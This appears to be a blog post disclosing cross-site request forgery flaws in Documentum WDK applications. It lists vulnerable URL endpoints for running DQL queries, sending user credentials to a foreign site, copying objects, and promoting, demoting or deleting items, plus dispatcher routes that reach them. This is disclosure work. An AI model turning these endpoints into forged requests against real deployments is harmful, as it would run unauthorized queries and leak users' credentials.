documentum security vulnerabilities: multiple XSRFs in WDK applications

Cross-site request forgery attack is completely described in WikiPedia, below is a list of URLs (or components) in WDK applications (like Webtop, TaskSpace, EPFM, Documentum Administrator) vulnerable to XSRF:

DQL execution

  • /webtop/component/dqleditor?query=<query>
  • /webtop/component/appintxdql?query=<query>
  • /webtop/component/search?queryType=dql&query=<query>
  • /da/component/auditlist?query=<query>
  • /webtop/component/historicalactivityreportresults?process_id=0000000000000000&query=<query>
  • /webtop/component/processdetailreportresults?process_id=0000000000000000&query=<query>
  • /webtop/component/historicalprocessreportresults?query=<query>
  • /webtop/component/historicaluserreportresults?query=<query>
  • /webtop/action/view?objectId=<objectId of dm_query object> (executes /webtop/component/search?queryType=dql&query=<query>)
  • /webtop/action/search?queryType=dql&query=<query> (executes /webtop/component/search?queryType=dql&query=<query>)

other

  • /webtop/component/virtuallinkconnect?redirectUrl=http://url&virtualLinkPath=/webtop/component/main (sends user credentials to foreign site, found in 6.7SP2)
  • /da/component/scsaveas?objectId=<objectId> (creates copy of objects, potentially can be used to apply less restrictive ACL to copy)
  • /webtop/action/deletenotification?type=dm_notification&routerId=0000000000000000&objectId=<objectId> (deletes dmi_queue_item object)
  • /webtop/action/demote?objectId=<objectId> (demotes document)
  • /webtop/action/promote?objectId=<objectId> (promotes document)

components could be launched either directly (as in examples above) or through container:

  • /webtop/component/dialogcontainer?component=search&queryType=dql&query=<query>&componentArgs=

or through appintgcontrollerlogin component:

  • /webtop/component/appintgcontrollerlogin?dispatchitem=search&dispatchtype=component&queryType=dql&query=<query>

actions could be launched through ActionDispatcherServlet (as in examples above) or through actiondispatcher component:

  • /webtop/component/actiondispatcher?action=search&queryType=dql&query=<query>

or through any component:

  • /webtop/component/main?startupAction=search&queryType=dql&query=<query>

One thought on “documentum security vulnerabilities: multiple XSRFs in WDK applications

  1. Pingback: God bless EMC. Part VII | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s